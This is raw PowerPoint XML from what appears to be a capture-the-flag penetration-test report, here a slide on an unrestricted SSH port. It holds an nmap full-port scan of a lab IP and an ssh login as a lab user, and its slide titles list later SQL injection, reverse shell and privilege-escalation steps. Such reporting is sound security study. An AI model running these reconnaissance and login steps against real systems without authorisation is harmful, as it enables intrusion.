              <a:t>During the reconnaissance phase, Nmap scans </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0"/>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" i="1" dirty="0"/>
              <a:t>Nmap =</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" i="1" dirty="0" err="1"/>
              <a:t>Pn</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" i="1" dirty="0"/>
              <a:t> -p- -</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" i="1" dirty="0" err="1"/>
              <a:t>sS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" i="1" dirty="0"/>
              <a:t> -</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" i="1" dirty="0" err="1"/>
              <a:t>sV</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" i="1" dirty="0"/>
              <a:t> 192.168.139.143</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0"/>
              <a:t>) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>were performed on the target machine. Port 22 was found open and listening with no firewall or access restrictions in place. There was no indication of rate-limiting, source-based filtering, or port-knocking to protect this critical service.</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" b="1" dirty="0"/>
              <a:t>Steps to Reproduce: </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" b="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="Ø"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Run Nmap Scan to Discover Open Ports : </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" b="1" i="1" dirty="0"/>
              <a:t>Nmap =</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" b="1" i="1" dirty="0" err="1"/>
              <a:t>Pn</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" b="1" i="1" dirty="0"/>
              <a:t> -p- -</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" b="1" i="1" dirty="0" err="1"/>
              <a:t>sS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" b="1" i="1" dirty="0"/>
              <a:t> -</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" b="1" i="1" dirty="0" err="1"/>
              <a:t>sV</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" b="1" i="1" dirty="0"/>
              <a:t> 192.168.139.143</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" i="1" dirty="0"/>
              <a:t>port 22</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="Ø"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Observed that is open and responds to connection attempts.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="Ø"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Attempted SSH login using: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" i="1" dirty="0"/>
              <a:t>ssh </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" i="1" dirty="0">
                <a:hlinkClick r:id="rId2">
                  <a:extLst>
                    <a:ext uri="{A12FA001-AC4F-418D-AE19-62706E023703}">
                      <ahyp:hlinkClr xmlns:ahyp="http://schemas.microsoft.com/office/drawing/2018/hyperlinkcolor" val="tx"/>
                    </a:ext>
                  </a:extLst>
                </a:hlinkClick>
              </a:rPr>
              <a:t>jehad@192.168.139.143</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" b="1" i="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="Ø"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-IN" dirty="0"/>
              <a:t>Validate Access and Post-Exploitation Potential: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" b="1" i="1" dirty="0" err="1"/>
              <a:t>pwd</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN" b="1" i="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" b="1" dirty="0"/>
              <a:t>Impact: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>If exploited, an attacker could gain shell access to the server, especially if weak or reused credentials are in place. This could lead to full system compromise, access to sensitive files, installation of malware or backdoors, and use of the machine to attack other systems within the internal network.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" b="1" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="Picture 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B3B7BB9E-B57C-D782-4A2B-7B3DF3BFE431}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="8388815" y="877434"/>
            <a:ext cx="2736385" cy="1063837"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:effectLst>
            <a:glow rad="228600">
              <a:schemeClr val="accent3">
                <a:satMod val="175000"/>
                <a:alpha val="40000"/>
              </a:schemeClr>
            </a:glow>
          </a:effectLst>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="Picture 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2662C701-95E8-FAF1-5235-976F09F10E0C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="8748467" y="2607041"/>
            <a:ext cx="2017079" cy="502861"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:effectLst>
            <a:glow rad="228600">
              <a:schemeClr val="accent3">
                <a:satMod val="175000"/>
                <a:alpha val="40000"/>
              </a:schemeClr>
            </a:glow>
          </a:effectLst>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="6" name="Picture 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DEC2F1C9-FD0B-2CC5-2393-37E3808D53E7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId5"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="8248246" y="3748099"/>
            <a:ext cx="3017520" cy="502860"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:effectLst>
            <a:glow rad="228600">
              <a:schemeClr val="accent3">
                <a:satMod val="175000"/>
                <a:alpha val="40000"/>
              </a:schemeClr>
            </a:glow>
            <a:outerShdw blurRad="50800" dist="38100" dir="2700000" algn="tl" rotWithShape="0">
              <a:prstClr val="black">
                <a:alpha val="40000"/>
              </a:prstClr>
            </a:outerShdw>
          </a:effectLst>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1104905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861</TotalTime>
  <Words>10338</Words>
  <Application>Microsoft Office PowerPoint</Application>
  <PresentationFormat>Widescreen</PresentationFormat>
  <Paragraphs>735</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Wood Type</vt:lpstr>
      <vt:lpstr>CTF Exploitation Breakdown form Recon to Root Shell.</vt:lpstr>
      <vt:lpstr>Agenda</vt:lpstr>
      <vt:lpstr>Abstract</vt:lpstr>
      <vt:lpstr>Vulnerability Summery</vt:lpstr>
      <vt:lpstr>Cont..</vt:lpstr>
      <vt:lpstr>OWASP Top 10</vt:lpstr>
      <vt:lpstr>Open SSH Port (22) Without Restriction</vt:lpstr>
      <vt:lpstr>Cont..</vt:lpstr>
      <vt:lpstr>Cont..</vt:lpstr>
      <vt:lpstr>Open HTTP Port (80) Without HTTPS or WAF</vt:lpstr>
      <vt:lpstr>Cont…</vt:lpstr>
      <vt:lpstr>Cont..</vt:lpstr>
      <vt:lpstr>Exposed .git Repository</vt:lpstr>
      <vt:lpstr>Cont..</vt:lpstr>
      <vt:lpstr>Cont..</vt:lpstr>
      <vt:lpstr>Credential Disclosure via Git Logs Vulnerability</vt:lpstr>
      <vt:lpstr>Cont..</vt:lpstr>
      <vt:lpstr>Cont..</vt:lpstr>
      <vt:lpstr>Weak Login Form (No Brute Force Protection)</vt:lpstr>
      <vt:lpstr>Cont..</vt:lpstr>
      <vt:lpstr>Cont..</vt:lpstr>
      <vt:lpstr>SQL Injection via ‘id’ Parameter</vt:lpstr>
      <vt:lpstr>Cont..</vt:lpstr>
      <vt:lpstr>Cont.. </vt:lpstr>
      <vt:lpstr>Database Schema Enumeration via SQL Injection</vt:lpstr>
      <vt:lpstr>Cont..</vt:lpstr>
      <vt:lpstr>Cont..</vt:lpstr>
      <vt:lpstr>Cont..</vt:lpstr>
      <vt:lpstr>Table and Column Enumeration via SQL Injection</vt:lpstr>
      <vt:lpstr>Cont..</vt:lpstr>
      <vt:lpstr>Cont..</vt:lpstr>
      <vt:lpstr>Credential Disclosure from ssh Table</vt:lpstr>
      <vt:lpstr>Cont..</vt:lpstr>
      <vt:lpstr>Cont..</vt:lpstr>
      <vt:lpstr>SSH Login via Reused Credentials</vt:lpstr>
      <vt:lpstr>Cont..</vt:lpstr>
      <vt:lpstr>Cont..</vt:lpstr>
      <vt:lpstr>Bash History Disclosure</vt:lpstr>
      <vt:lpstr>Cont..</vt:lpstr>
      <vt:lpstr>Cont..</vt:lpstr>
      <vt:lpstr>Exposed Internal Web Service on Port 9999</vt:lpstr>
      <vt:lpstr>Cont..</vt:lpstr>
      <vt:lpstr>Cont..</vt:lpstr>
      <vt:lpstr>Remote Code Execution via cmd Parameter</vt:lpstr>
      <vt:lpstr>Cont..</vt:lpstr>
      <vt:lpstr>Cont..</vt:lpstr>
      <vt:lpstr>Reverse Shell Execution via RCE</vt:lpstr>
      <vt:lpstr>Cont..</vt:lpstr>
      <vt:lpstr>Cont..</vt:lpstr>
      <vt:lpstr>Privilege Escalation via sudo python3</vt:lpstr>
      <vt:lpstr>Cont..</vt:lpstr>
      <vt:lpstr>Cont..</vt:lpstr>
      <vt:lpstr>Flag Disclosure due to Weak File Permissions</vt:lpstr>
      <vt:lpstr>Cont..</vt:lpstr>
      <vt:lpstr>Cont..</vt:lpstr>
      <vt:lpstr>Tools and Commands Used in this Project:</vt:lpstr>
      <vt:lpstr>Cont..</vt:lpstr>
      <vt:lpstr>Cont..</vt:lpstr>
      <vt:lpstr>Recommendations:</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K</dc:creator>
  <cp:lastModifiedBy>Shubham K</cp:lastModifiedBy>
  <cp:revision>2</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2025-08-03T15:36:20Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2025-08-04T06:49:10Z</dcterms:modified>
</cp:coreProperties>
</file>